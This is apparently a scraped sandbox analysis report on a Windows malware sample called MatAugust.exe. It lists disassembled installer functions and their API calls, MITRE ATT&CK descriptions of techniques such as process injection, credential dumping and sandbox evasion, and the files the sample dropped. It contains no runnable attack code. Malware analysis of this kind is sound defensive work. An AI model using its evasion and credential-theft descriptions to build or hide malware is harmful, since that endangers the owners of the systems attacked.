ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MatAugust.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\wlxlf\16xlfu

C:\ProgramData\wlxlf\37ycjm

C:\ProgramData\wlxlf\4wln7gvsr

C:\ProgramData\wlxlf\5fk6fu

C:\ProgramData\wlxlf\8900hv

C:\ProgramData\wlxlf\c2no8yc2d

C:\ProgramData\wlxlf\cjw47q

C:\ProgramData\wlxlf\jw4wb1

C:\ProgramData\wlxlf\wlngd2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\h

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Born

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Calgary

Windows Analysis Report
MatAugust.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre